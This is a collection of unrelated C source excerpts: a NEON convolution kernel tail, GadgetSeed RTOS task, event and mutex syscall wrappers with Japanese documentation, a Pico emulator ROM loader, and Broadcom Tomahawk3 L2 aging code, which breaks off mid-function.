vfmaq_f32(vacc0123p0, vi6x0123, vk6x0123); const float32x4_t vi7x0123 = vld1q_f32(i7); const float32x4_t vk7x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi7x0123, vk7x0123); const float32x4_t vi8x0123 = vld1q_f32(i8); const float32x4_t vk8x0123 = vld1q_f32(w); w += 4; vacc0123p0 = vfmaq_f32(vacc0123p0, vi8x0123, vk8x0123); float32x4_t vacc0123 = vmaxq_f32(vacc0123p0, vmin); vacc0123 = vminq_f32(vacc0123, vmax); float32x2_t vacc01 = vget_low_f32(vacc0123); if (c & 2) { vst1_f32(output, vacc01); output += 2; vacc01 = vget_high_f32(vacc0123); } if (c & 1) { vst1_lane_f32(output, vacc01, 0); output += 1; } } output = (float*) ((uintptr_t) output + output_increment); } while (--output_width != 0); }
281718.c
/** @file @brief タスク制御API これらの関数はタスク状態から実行されなければならない @date 2017.11.25 @auther Takashi SHUDO @page task_syscall タスク制御 GadgetSeedのカーネルはマルチタスクカーネルです。\n GedgetSeedはタスク間同期の機能として以下の機能があります。 - @ref event - @ref mutex @section task_status タスク状態 GadgetSeedの各タスクは以下のように状態遷移します。 ![タスク状態](task_status.svg) | 状態名 | 状態 | |:------------------|:------------------------------| | READY | 実行可能状態 | | RUN | 実行状態 | | TIMER_WAIT | タイマ待ち状態 | | EVENT_WAIT | イベント待ち状態 | | MUTEX_WAIT | MUTEXロック解除待ち状態 | | REQUEST_WAIT | 起床待ち状態 | | DORMANT_WAIT | 休止状態 | --- @section task_context タスクコンテキスト タスクコンテキストは以下の構造体で定義されます。 @ref st_tcb @copybrief st_tcb ユーザが作成する各タスクは、スタティックに st_tcb 構造のデータを定義する必要があります。 タスクには名前をつけることができます。 タスクには優先順位があります。タスク優先順位デフォルトでは0(最高)から7(最低)の8段階を設定することができます。 タスク優先順位の数はコンフィグレーションマクロ GSC_KERNEL_MAX_TASK_PRIORITY を定義することにより変更することができます。 各タスクのスタックメモリは、各タスク毎にスタティックに定義する必要があります。 タスクの実行例として、 init_gs() で実行している task_exec() の実行例を参照して下さい。 タスク用APIは @ref task_api を参照して下さい。 --- @section event イベント GadgetSeed は一般的な RTOS のイベントフラグのような同期機構としてイベントがあります。 @ref event_api は、タスク間および、タスクと非タスクコンテキスト(割り込みハンドラ等)間の同期を行うために使用できます。 @ref not_task_event_api はイベントの発生通知のみ行うことができます。 例えば、タスクで event_wait() を実行し、IO割り込みハンドラで event_wakeup_ISR() を実行し、タスクでIOのデータの受信を待ちます。 この場合、event_wait() を実行したタスクは、IO割り込みハンドラで event_wakeup_ISR() が実行されるまで「イベント待ち状態」になります。 イベントを使用するには、以下に示すイベント構造体を定義し、 eventqueue_register() 、 eventqueue_register_ISR() 関数でイベント 構造体データをシステムに登録する必要があります。 @ref st_event @copybrief st_event イベント用APIは @ref event_api を参照して下さい。 --- @section mutex MUTEX GadgetSeed はリソースの排他機構 MUTEX があります。 MUTEX API はタスクからのみ実行できます。 MUTEX をロックしたタクスのみが、 MUTEX をアンロックすることができます。 MUTEX を使用するには、以下に示す MUTEX 構造体を定義し、 mutex_register() 、 mutex_register_ISR() 関数で MUTEX 構造体データ をシステムに登録する必要があります。 @ref st_mutex @copybrief st_mutex MUTEX 用APIは @ref mutex_api を参照して下さい。 --- @section task_api タスク制御API include ファイル : syscall.h | API名 | 機能 | |:--------------------------|:------------------------------| | task_add() | @copybrief task_add | | task_exec() | @copybrief task_exec | | task_exit() | @copybrief task_exit | | task_pause() | @copybrief task_pause | | task_sleep() | @copybrief task_sleep | | task_kill() | @copybrief task_kill | | task_wakeup() | @copybrief task_wakeup | | task_wakeup_id_ISR() | @copybrief task_wakeup_id_ISR | --- @section event_api イベントAPI @subsection task_event_api タスクコンテキスト用 include ファイル : syscall.h | API名 | 機能 | |:--------------------------|:--------------------------------------| | eventqueue_register() | @copybrief eventqueue_register | | event_wait() | @copybrief event_wait | | event_check() | @copybrief event_check | | event_clear() | @copybrief event_clear | | event_wakeup() | @copybrief event_wakeup | | eventqueue_unregister() | @copybrief eventqueue_unregister | @subsection not_task_event_api 非タスクコンテキスト用(システム初期化時/割り込みハンドラ用) include ファイル : task/event.h | API名 | 機能 | |:--------------------------|:--------------------------------------| | eventqueue_register_ISR() | @copybrief eventqueue_register_ISR | | event_push_ISR() | @copybrief event_push_ISR | | event_set_ISR() | @copybrief event_set_ISR | | event_wakeup_ISR() | @copybrief event_wakeup_ISR | | eventqueue_unregister_ISR() | @copybrief eventqueue_unregister_ISR| --- @section mutex_api MUTEX API @subsection task_mutex_api タスクコンテキスト用 include ファイル : syscall.h | API名 | 機能 | |:--------------------------|:------------------------------| | mutex_register() | @copybrief mutex_register | | mutex_lock() | @copybrief mutex_lock | | mutex_unlock() | @copybrief mutex_unlock | | mutex_unregister() | @copybrief mutex_unregister | @subsection not_task_mutex_api 非タスクコンテキスト用(システム初期化時/割り込みハンドラ用) include ファイル : task/mutex.h | API名 | 機能 | |:--------------------------|:--------------------------------------| | mutex_register_ISR() | @copybrief mutex_register_ISR | | mutex_unregister_ISR() | @copybrief mutex_unregister_ISR | */ #include "syscall.h" #include "syscall_param.h" #include "task_opration.h" //#define DEBUGKBITS 0x01 #include "dkprintf.h" /** @brief タスクを追加する 本関数は、タスクを実行キューに追加するのみであり、追加されたタスク は実行状態にならない。 @param[in] func タスク関数 @param[in] name タスク名文字列ポインタ @param[in] priority タスク優先度 @param[in] tcb タスクコンテキストポインタ @param[in] stack タスクスタックポインタ @param[in] stack_size タスクスタックサイズ @param[in] arg タスク実行時引数ポインタ @return !=0:エラー */ int task_add(task_func func, char *name, int priority, struct st_tcb *tcb, unsigned int *stack, int stack_size, void *arg) { volatile struct exec_task_param param; DKFPRINTF(0x01, "\n"); if(priority >= GSC_KERNEL_MAX_TASK_PRIORITY) { return -1; } param.func = func; param.name = name; param.priority = priority; param.tcb = tcb; param.stack = stack; param.stack_size= stack_size;; param.arg = arg; DKPRINTF(0x01, "exec param = %p\n", &param); DKPRINTF(0x01, "exec func = %p\n", param.func); DKPRINTF(0x01, "exec name = \"%s\"\n", param.name); sys_call(SYSCALL_TASK_ADD, (void *)&param); return param.ret; } /** @brief タスクを追加し起動する タスクを実行キューに追加し、追加したタスクを実行状態にする。 @param[in] func タスク関数 @param[in] name タスク名文字列ポインタ @param[in] priority タスク優先度 @param[in] tcb タスクコンテキストポインタ @param[in] stack タスクスタックポインタ @param[in] stack_size タスクスタックサイズ @param[in] arg タスク実行時引数ポインタ @return !=0:エラー */ int task_exec(task_func func, char *name, int priority, struct st_tcb *tcb, unsigned int *stack, int stack_size, void *arg) { volatile struct exec_task_param param; DKFPRINTF(0x01, "\n"); if(priority >= GSC_KERNEL_MAX_TASK_PRIORITY) { return -1; } param.func = func; param.name = name; param.priority = priority; param.tcb = tcb; param.stack = stack; param.stack_size= stack_size;; param.arg = arg; DKPRINTF(0x01, "exec param = %p\n", &param); DKPRINTF(0x01, "exec func = %p\n", param.func); DKPRINTF(0x01, "exec name = \"%s\"\n", param.name); sys_call(SYSCALL_TASK_EXEC, (void *)&param); return param.ret; } /** @brief タスクを終了する 本関数を実行したタスクは終了し、実行キューから削除される。 */ void task_exit(void) { DKFPRINTF(0x01, "\n"); sys_call(SYSCALL_TASK_EXIT, (void *)0); } /** @brief タスクを停止する 本関数を実行したタスクは停止する。 */ void task_pause(void) { DKFPRINTF(0x01, "\n"); sys_call(SYSCALL_TASK_PAUSE, (void *)0); } /** @brief タスクを指定時間タイマ待ち状態にする 本関数を実行したタスクを stime (msec)休止する。 @param[in] stime 停止時間(msec) */ void task_sleep(unsigned int stime) { DKFPRINTF(0x01, "stime = %ld\n", stime); sys_call(SYSCALL_TASK_SLEEP, (void *)(long)stime); } /** @brief 指定したタスクを終了する id で指定したタスクを終了する。 @param[in] id タスクID */ void task_kill(int id) { DKFPRINTF(0x01, "id = %d\n", id); sys_call(SYSCALL_TASK_KILL, (void *)(long)id); } /** @brief 指定したタスクを実行状態にする id で指定したタスクを実行状態にする。 @param[in] id タスクID */ void task_wakeup(int id) { DKFPRINTF(0x01, "id = %d\n", id); sys_call(SYSCALL_TASK_WAKEUP, (void *)(long)id); } /** @brief 指定したタスクの優先度を設定する id で指定したタスクの優先度を設定する。 @param[in] id タスクID @param[in] priority 優先度 */ void task_priority(int id, int priority) { volatile struct st_task_priority_param param; DKFPRINTF(0x01, "\n"); param.id = id; param.priority = priority; sys_call(SYSCALL_TASK_PRIORITY, (void *)&param); } /* * イベント */ /** @brief イベントキューを登録する @param[in] evtque イベントキューポインタ @param[in] name イベントキュー名文字列ポインタ @param[in] args イベントキュー引数バッファポインタ @param[in] size 1イベント引数のサイズ @param[in] count キューするイベント数 */ void eventqueue_register(struct st_event *evtque, const char *name, void *args, unsigned int size, int count) { volatile struct evtque_param param; DKFPRINTF(0x01, "evtque = \"%s\" %p size = %d, count = %d\n", name, evtque, size, count); param.evtque = evtque; param.name = name; param.arg = args; param.size = size; param.count = count; sys_call(SYSCALL_EVTQUE_INIT, (void *)&param); } /** @brief タスクをイベント待ち状態にする @param[in] evtque イベントキューポインタ @param[out] args イベント引数ポインタ @param[in] timeout イベントタイムアウト待ち時間(msec) @return 待ちタイムアウト残り時間(msec)(<0:タイムアウト) */ int event_wait(struct st_event *evtque, void *arg, unsigned int timeout) { volatile struct evtque_param param; DKFPRINTF(0x01, "evtque = \"%s\" %p timeout = %ld\n", evtque->name, evtque, timeout); param.evtque = evtque; param.timeout = timeout; param.arg = arg; param.ret = -1; // タイムアウト時は-1を返す為 DKPRINTF(0x01, "exec param = %p\n", &param); DKPRINTF(0x01, "evtque = %p\n", param.evtque); DKPRINTF(0x01, "arg = %p\n", param.arg); DKPRINTF(0x01, "timeout = %ld\n", (unsigned int)param.timeout); KXDUMP(0x02, arg, evtque->size); if(run_task == &dummy_task) { #ifndef GSC_TARGET_SYSTEM_EMU SYSERR_PRINT("No running task\n"); print_queues(); #endif return 0; } sys_call(SYSCALL_EVTQUE_WAIT, (void *)&param); return param.ret; } /** @brief イベントキューにイベントが登録されているか調べる @param[in] evtque イベントキューポインタ @return 登録されているイベント数(=0:イベント未登録) */ int event_check(struct st_event *evtque) { volatile struct evtque_param param; DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque); param.evtque = evtque; param.ret = 0; if(run_task == &dummy_task) { #ifndef GSC_TARGET_SYSTEM_EMU SYSERR_PRINT("No running task\n"); print_queues(); #endif return 0; } sys_call(SYSCALL_EVTQUE_CHECK, (void *)&param); return param.ret; } /** @brief イベントキューに登録されているイベントを削除する @param[in] evtque イベントキューポインタ */ void event_clear(struct st_event *evtque) { DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque); if(run_task == &dummy_task) { #ifndef GSC_TARGET_SYSTEM_EMU SYSERR_PRINT("No running task\n"); print_queues(); #endif return; } sys_call(SYSCALL_EVTQUE_CLEAR, (void *)evtque); } /** @brief イベントキューにイベントを登録する このイベントキューでイベント待ちのタスクは起床する @param[in] evtque イベントキューポインタ @param[in] arg イベント引数ポインタ */ void event_wakeup(struct st_event *evtque, void *arg) { volatile struct evtque_param param; DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque); KXDUMP(0x02, arg, evtque->size); param.evtque = evtque; param.arg = arg; if(run_task == &dummy_task) { #ifndef GSC_TARGET_SYSTEM_EMU SYSERR_PRINT("No running task\n"); print_queues(); #endif return; } sys_call(SYSCALL_EVTQUE_WAKEUP, (void *)&param); } /** @brief イベントキューを登録解除する @param[in] evtque イベントキューポインタ */ void eventqueue_unregister(struct st_event *evtque) { DKFPRINTF(0x01, "evtque = \"%s\" %p\n", evtque->name, evtque); sys_call(SYSCALL_EVTQUE_DISPOSE, (void *)evtque); } /* * MUTEX */ /** @brief MUTEXを登録する @param[in] mutex MUTEXポインタ @param[in] name MUTEX名文字列ポインタ */ void mutex_register(struct st_mutex *mutex, const char *name) { volatile struct mutex_param param; DKFPRINTF(0x01, "%s mutex = \"%s\" %p\n", name, mutex); param.mutex = mutex; param.name = name; sys_call(SYSCALL_MUTEX_INIT, (void *)&param); } /** @brief MUTEXをロックする @param[in] mutex MUTEXポインタ @param[in] timeout タイムアウト時間(msec) @return 待ちタイムアウト残り時間(msec)(<0:タイムアウト) */ int mutex_lock(struct st_mutex *mutex, unsigned int timeout) { volatile struct mutex_param param; DKFPRINTF(0x01, "mutex = \"%s\" %p timeout = %ld\n", mutex->name, mutex, timeout); param.mutex = mutex; param.timeout = timeout; DKPRINTF(0x01, "exec param = %p\n", &param); DKPRINTF(0x01, "mutex = %p\n", param.mutex); DKPRINTF(0x01, "timeout = %08lX\n", (unsigned int)param.timeout); sys_call(SYSCALL_MUTEX_LOCK, (void *)&param); return param.ret; } /** @brief MUTEXをアンロックする @param[in] mutex MUTEXポインタ @return 待ちタイムアウト残り時間(msec)(=0:タイムアウト指定のないMUTEX) */ int mutex_unlock(struct st_mutex *mutex) { volatile struct mutex_param param; DKFPRINTF(0x01, "mutex = \"%s\" %p\n", mutex->name, mutex); param.mutex = mutex; DKPRINTF(0x01, "exec param = %p\n", &param); DKPRINTF(0x01, "mutex = %p\n", param.mutex); sys_call(SYSCALL_MUTEX_UNLOCK, (void *)&param); return param.ret; } /** @brief MUTEXを登録解除する @param[in] mutex MUTEXポインタ */ void mutex_unregister(struct st_mutex *mutex) { DKFPRINTF(0x01, "mutex = \"%s\" %p\n", mutex->name, mutex); sys_call(SYSCALL_MUTEX_DISPOSE, (void *)mutex); } /* コンソールIO設定 */ /** @brief 実行タスクの標準入力デバイスを設定する @param[in] dev デバイス @remarks dev が 0 の場合はシステム標準入力デバイスが設定される */ void set_console_in_device(struct st_device *dev) { DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev); sys_call(SYSCALL_SET_CONSOLE_IN, (void *)dev); } /** @brief 実行タスクの標準出力デバイスを設定する @param[in] dev デバイス @remarks dev が 0 の場合はシステム標準出力デバイスが設定される */ void set_console_out_device(struct st_device *dev) { DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev); sys_call(SYSCALL_SET_CONSOLE_OUT, (void *)dev); } /** @brief 実行タスクのエラー出力デバイスを設定する @param[in] dev デバイス @remarks dev が 0 の場合はシステム標準エラー出力デバイスが設定される */ void set_error_out_device(struct st_device *dev) { DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev); sys_call(SYSCALL_SET_ERROR_OUT, (void *)dev); } /* デバッグ用API */ int task_get_tasks_info(struct st_task_info *ti, int count) { volatile struct st_task_info_param param; DKFPRINTF(0x01, "\n"); param.ti = ti; param.count = count; sys_call(SYSCALL_GET_TASKS_INFO, (void *)&param); return param.ret; } void print_task_list(void) { DKFPRINTF(0x01, "\n"); sys_call(SYSCALL_PRINT_TASK_LIST, (void *)0); } void print_task_queue(void) { DKFPRINTF(0x01, "\n"); sys_call(SYSCALL_PRINT_TASK_QUEUE, (void *)0); } void print_call_trace(void) { DKFPRINTF(0x01, "\n"); sys_call(SYSCALL_PRINT_CALLTRACE, (void *)0); }
521851.c
#include "pico_rom.h" #include "config.h" #include "pico_cpu.h" #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> bool is_valid_rom_addr(pico_addr addr) { return (addr - PICO_ROM_ADDR) < PICO_ROM_SIZE; } int read_rom_8(pico_addr raw_addr, struct pico_cpu *cpu, uint8_t *target, struct memory_region *self) { uint8_t *v = self->data + (raw_addr); *target = *v; return 0; } int read_rom_16(pico_addr raw_addr, struct pico_cpu *cpu, uint16_t *target, struct memory_region *self) { uint16_t *v = (uint16_t *)(self->data + (raw_addr)); *target = *v; return 0; } int read_rom_32(pico_addr raw_addr, struct pico_cpu *cpu, uint32_t *target, struct memory_region *self) { uint32_t *v = (uint32_t *)(self->data + (raw_addr)); *target = *v; return 0; } int init_rom(struct pico_cpu *cpu) { FILE *f = fopen("bootrom", "rb"); if (f == NULL) { printf("error while reading bootrom...\n"); return -1; } fseek(f, 0, SEEK_END); long fsize = ftell(f); fseek(f, 0, SEEK_SET); if (fsize > PICO_ROM_SIZE) { printf("pico bootrom size is %li and should be below %i \n", fsize, PICO_ROM_SIZE); fclose(f); return -2; } struct memory_region *mem_region = malloc(sizeof(struct memory_region)); mem_region->data = malloc(PICO_ROM_SIZE); mem_region->data_size = PICO_ROM_SIZE; mem_region->data_is_malloc = true; fread(mem_region->data, 1, fsize, f); fclose(f); mem_region->can_write = false; mem_region->can_read = true; mem_region->name = "ROM"; mem_region->start = PICO_ROM_ADDR; mem_region->size = PICO_ROM_SIZE; mem_region->read8 = read_rom_8; mem_region->read16 = read_rom_16; mem_region->read32 = read_rom_32; mem_region->write8 = NULL; mem_region->write16 = NULL; mem_region->write32 = NULL; add_dynamic_memory_region(&cpu->regions, mem_region); return 0; } bool init_boot_rom_vector(struct pico_bootrom_vector *target, struct pico_cpu *cpu) { size_t length_to_read = sizeof(struct pico_bootrom_vector); uint8_t *raw_target = malloc(sizeof(struct pico_bootrom_vector)); for (uint32_t i = 0; i < length_to_read; i++) { if (read_memory_byte(cpu, raw_target + i, i) != 0) { return 0; } } memcpy(target, raw_target, length_to_read); free(raw_target); return true; }
247690.c
/**************************************************************************** * * This license is set out in https://raw.githubusercontent.com/Broadcom-Network-Switching-Software/OpenBCM/master/Legal/LICENSE file. * * Copyright 2007-2019 Broadcom Inc. All rights reserved. * */ #include <shared/bsl.h> #include <sal/core/libc.h> #include <sal/types.h> #include <shared/bsl.h> #include <soc/drv.h> #include <soc/l2x.h> #include <soc/ptable.h> #include <soc/debug.h> #include <soc/util.h> #include <soc/mem.h> #include <soc/iproc.h> #include <soc/mcm/intr_iproc.h> #include <soc/tomahawk3.h> #if defined(BCM_TOMAHAWK3_SUPPORT) #ifdef BCM_XGS_SWITCH_SUPPORT /* Size of AVL table used for learning entries */ #define _SOC_TH3_L2_LRN_TBL_SIZE 8192 #define SOC_MEM_COMPARE_RETURN(a, b) { \ if ((a) < (b)) { return -1; } \ if ((a) > (b)) { return 1; } \ } typedef struct soc_l2_lrn_avl_info_s { vlan_id_t vlan; soc_module_t mod; int dest_type; /* 0=dest. is port, 1=dest. is trunk */ int port_tgid; /* Holds port num if dest_type is 0. Holds TGID if dest_type is 1 */ sal_mac_addr_t mac; int in_hw; /* Entry programmed in h/w. Used to avoid hits due to duplicate pkts */ } soc_l2_lrn_avl_info_t, *soc_l2_lrn_avl_info_p; static int _soc_th3_l2_bulk_age_iter[SOC_MAX_NUM_DEVICES] = {0}; static uint8 rev_id = 0; static uint16 dev_id = 0; /* * Function: * soc_th3_l2x_shadow_callback * Purpose: * Internal callback routine for updating an AVL tree shadow table * Parameters: * unit - StrataSwitch unit number. * entry_del - Entry to be deleted or updated, NULL if none. * entry_add - Entry to be inserted or updated, NULL if none. * fn_data - unused. * Notes: * Used only if L2X shadow table is enabled. */ STATIC void soc_th3_l2x_shadow_callback(int unit, int flags, l2x_entry_t *entry_del, l2x_entry_t *entry_add, void *fn_data) { soc_control_t *soc = SOC_CONTROL(unit); if (flags & (SOC_L2X_ENTRY_DUMMY | SOC_L2X_ENTRY_NO_ACTION | SOC_L2X_ENTRY_OVERFLOW)) { return; } /* Since sync thread (bcmL2X) updates both its own database and learn * shadow database, we make sure both threads are running, and are synced * together */ if ((soc->l2x_pid != SAL_THREAD_ERROR) && (soc->arlShadowMutex != NULL) && (soc->arlShadow != NULL) && (soc->l2x_learn_pid != SAL_THREAD_ERROR) && (soc->l2x_lrn_shadow_mutex != NULL)) { int rv; sal_mutex_take(soc->arlShadowMutex, sal_mutex_FOREVER); if (entry_del != NULL) { rv = shr_avl_delete(soc->arlShadow, soc_l2x_entry_compare_key, (shr_avl_datum_t *)entry_del); if (rv == 0) { sal_mac_addr_t mac; vlan_id_t vlan; int dest; soc_mem_mac_addr_get(unit, L2Xm, entry_del, MAC_ADDRf, mac); vlan = soc_mem_field32_get(unit, L2Xm, entry_del, VLAN_IDf); dest = soc_mem_field32_get(unit, L2Xm, entry_del, DESTINATIONf); LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "AVL delete: datum not found:\n dest %d, vlan %d," " mac(hex) %02X:%02X:%02X:%02X:%02X:%02X\n"), dest, vlan, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5])); } } if (entry_add != NULL) { shr_avl_insert(soc->arlShadow, soc_l2x_entry_compare_key, (shr_avl_datum_t *)entry_add); } sal_mutex_give(soc->arlShadowMutex); /* Update shadow learn table after successful h/w update(s) */ /* Note the order of delete and insert below is important, since for * station move condition in _soc_th3_learn_cache_entry_process, we * delete an entry first and then insert it with the new port info */ sal_mutex_take(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex, sal_mutex_FOREVER); if (entry_del != NULL) { soc_th3_lrn_shadow_delete(unit, entry_del); } if (entry_add != NULL) { soc_th3_lrn_shadow_insert(unit, entry_add); } sal_mutex_give(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); } } /* * Function: * soc_th3_l2x_detach * Purpose: * Deallocate L2X subsystem resources * Parameters: * unit - StrataSwitch unit number. * Returns: * SOC_E_XXX * Notes: * Learn cache interrupt is disabled. Learn cache is cleared, learn cache * status bits are cleared */ int soc_th3_l2x_detach(int unit) { soc_control_t *soc = SOC_CONTROL(unit); /* Free reources allocated for shadow table */ soc_l2x_unregister(unit, soc_th3_l2x_shadow_callback, NULL); /* Free cml_freeze structure */ _soc_l2x_cml_struct_free(unit); if (soc->arlShadow != NULL) { shr_avl_destroy(soc->arlShadow); soc->arlShadow = NULL; } if (soc->arlShadowMutex != NULL) { sal_mutex_destroy(soc->arlShadowMutex); soc->arlShadowMutex = NULL; } return SOC_E_NONE; } /* * Function: * soc_th3_l2x_attach * Purpose: * Allocate L2X subsystem resources * Parameters: * unit - StrataSwitch unit number. * Returns: * SOC_E_XXX * Notes: * The L2X tree shadow table is always allocated, since it will be used in * learning, aging and table management. Value of spn_L2XMSG_AVL will be * ignored */ int soc_th3_l2x_attach(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int datum_bytes, datum_max; (void)soc_th3_l2x_detach(unit); datum_bytes = sizeof (l2x_entry_t); datum_max = soc_mem_index_count(unit, L2Xm); if (shr_avl_create(&soc->arlShadow, INT_TO_PTR(unit), datum_bytes, datum_max) < 0) { return SOC_E_MEMORY; } if ((soc->arlShadowMutex = sal_mutex_create("asMutex")) == NULL) { (void)soc_l2x_detach(unit); return SOC_E_MEMORY; } soc_l2x_register(unit, soc_th3_l2x_shadow_callback, NULL); /* Reset l2 freeze structure */ soc_th3_l2x_reset_freeze_state(unit); /* Allocate cml freeze structure */ SOC_IF_ERROR_RETURN(_soc_l2x_cml_struct_alloc(unit)); return SOC_E_NONE; } /* * Function: * _soc_th3_l2_age_entries_process * Purpose: * This function is invoked as part of aging mechanism to check for hit bits * and take appropriate action (either clear the hit bits, or delete the entry) * Since there is no h/w aging support, nor do we have bulk operations block in * hardware's L2 implementation, this function reads L2X entries, and takes * decision one entry at a time * Parameters: * unit - unit number * Returns: * SOC_E_NONE on success, or other SOC_E_* error code on failure * Notes: * This function will execute much slower than other devices that have * hardware support for aging. Entries are processed one at a time */ STATIC int _soc_th3_l2_age_entries_process(int unit, l2x_entry_t *l2x_entries) { uint32 index_min, index_max, count; int i; int rv; index_min = soc_mem_index_min(unit, L2Xm); index_max = soc_mem_index_max(unit, L2Xm); count = soc_mem_index_count(unit, L2Xm); sal_memset((void *)l2x_entries, 0, sizeof(l2x_entry_t) * count); /* Read L2 table */ soc_mem_lock(unit, L2Xm); rv = soc_mem_read_range(unit, L2Xm, MEM_BLOCK_ANY, index_min, index_max, l2x_entries); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:DMA read failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); /* We do not return error, otherwise thread will be killed. If thread * is alive it can be debugged */ return SOC_E_NONE; } for (i = index_min; i <= index_max; i++) { l2x_entry_t *l2x_entry; uint32 hit_da, hit_sa, local_sa; l2x_entry = soc_mem_table_idx_to_pointer(unit, L2Xm, l2x_entry_t*, l2x_entries, i); /* Skip invalid entry */ if (!soc_L2Xm_field32_get(unit, l2x_entry, BASE_VALIDf)) { continue; } /* Skip static entry */ if (soc_L2Xm_field32_get(unit, l2x_entry, STATIC_BITf)) { continue; } hit_da = soc_L2Xm_field32_get(unit, l2x_entry, HITDAf); hit_sa = soc_L2Xm_field32_get(unit, l2x_entry, HITSAf); local_sa = soc_L2Xm_field32_get(unit, l2x_entry, LOCAL_SAf); /* If no hot bits are set, delete the entry */ if (!(hit_da || hit_sa || local_sa)) { /* Delete entry */ soc_mem_lock(unit, L2Xm); rv = soc_mem_delete(unit, L2Xm, MEM_BLOCK_ALL, (void *)l2x_entry); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { /* If entry is not found, it has been deleted by other source, * e.g. address delete from application. So we ignore not found * condition here */ if (rv != SOC_E_NOT_FOUND) { LOG_WARN(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:soc mem delete failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } } } else { /* Clear hit bits */ soc_L2Xm_field32_set(unit, l2x_entry, HITDAf, 0); soc_L2Xm_field32_set(unit, l2x_entry, HITSAf, 0); soc_L2Xm_field32_set(unit, l2x_entry, LOCAL_SAf, 0); soc_mem_lock(unit, L2Xm); rv = soc_mem_write(unit, L2Xm, MEM_BLOCK_ALL, i, (void *)l2x_entry); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { /* We do not return error, otherwise thread will be killed. If * thread is alive it can be debugged */ LOG_WARN(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:soc mem write failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } } /* When an entry is deleted, soc_th3_l2x_shadow_callback will call * learn shadow upadate function. So we don't call learn shadow update * function here */ } return SOC_E_NONE; } /* * Function: * _soc_th3_l2_age * Purpose: * Handler function for L2 entry aging thread * Parameters: * unit - unit number * Returns: * none */ STATIC void _soc_th3_l2_age(void *unit_ptr) { int unit = PTR_TO_INT(unit_ptr); int c, m, r, rv, iter = 0; soc_control_t *soc = SOC_CONTROL(unit); sal_usecs_t interval; sal_usecs_t stime, etime; l2x_entry_t *buffer; /* Allocate memory to accomodate L2X table */ buffer = soc_cm_salloc(unit, sizeof(l2x_entry_t) * soc_mem_index_count(unit, L2Xm), "L2Xm_age"); if (buffer == NULL) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "_soc_th3_l2_age: " "Memory alloc failed, size %d\n"), (int)(sizeof(l2x_entry_t) * soc_mem_index_count(unit, L2Xm)))); goto cleanup_exit; } while((interval = soc->l2x_age_interval) != 0) { if (!iter) { goto age_delay; } LOG_VERBOSE(BSL_LS_SOC_ARL, (BSL_META_U(unit, "l2_age_thread: " "Process iters(total:%d, this run:%d\n"), ++_soc_th3_l2_bulk_age_iter[unit], iter)); stime = sal_time_usecs(); if (!soc->l2x_age_enable) { goto age_delay; } if (soc_mem_index_count(unit, L2Xm) == 0) { goto cleanup_exit; } rv = _soc_th3_l2_age_entries_process(unit, buffer); if (!SOC_SUCCESS(rv)) { goto cleanup_exit; } etime = sal_time_usecs(); LOG_VERBOSE(BSL_LS_SOC_ARL, (BSL_META_U(unit, "l2_bulk_age_thread: unit=%d: done in %d usec\n"), unit, SAL_USECS_SUB(etime, stime))); age_delay: rv = -1; /* timeout */ if (interval > 2147) { m = (interval / 2147) * 1000; r = (interval % 2147) * 1000000; for (c = 0; c < m; c++) { rv = sal_sem_take(soc->l2x_age_notify, 2147000); /* age interval is changed */ if (rv == 0 || interval != soc->l2x_age_interval) { break; } } /* age interval is changed */ if (soc->l2x_age_interval && (rv == 0 || interval != soc->l2x_age_interval)) { interval = soc->l2x_age_interval; goto age_delay; } else if (r) { /* age interval is not changed */ (void)sal_sem_take(soc->l2x_age_notify, r); } } else { rv = sal_sem_take(soc->l2x_age_notify, interval * 1000000); /* age interval is changed */ if (soc->l2x_age_interval && (rv == 0 || interval != soc->l2x_age_interval)) { interval = soc->l2x_age_interval; goto age_delay; } } iter++; } cleanup_exit: if (buffer != NULL) { soc_cm_sfree(unit, buffer); } LOG_VERBOSE(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "l2_age_thread: exiting\n"))); soc->l2x_age_pid = SAL_THREAD_ERROR; sal_thread_exit(0); /* return; */ } /* * Function: * soc_th3_l2_age_start * Purpose: * Start L2 aging thread * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ int soc_th3_l2_age_start(int unit, int interval) { int cfg_interval; soc_control_t *soc = SOC_CONTROL(unit); cfg_interval = soc_property_get(unit, spn_L2_SW_AGING_INTERVAL, SAL_BOOT_QUICKTURN ? 30 : 10); SOC_CONTROL_LOCK(unit); soc->l2x_age_interval = interval ? interval : cfg_interval; sal_snprintf(soc->l2x_age_name, sizeof (soc->l2x_age_name), "bcmL2age.%d", unit); soc->l2x_age_pid = sal_thread_create(soc->l2x_age_name, SAL_THREAD_STKSZ, soc_property_get(unit, spn_L2AGE_THREAD_PRI, 50), _soc_th3_l2_age, INT_TO_PTR(unit)); if (soc->l2x_age_pid == SAL_THREAD_ERROR) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_age_start: Could not start" " L2 aging thread\n"))); SOC_CONTROL_UNLOCK(unit); return SOC_E_MEMORY; } SOC_CONTROL_UNLOCK(unit); return SOC_E_NONE; } /* * Function: * soc_th3_l2_age_stop * Purpose: * Stop l2 aging thread * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ int 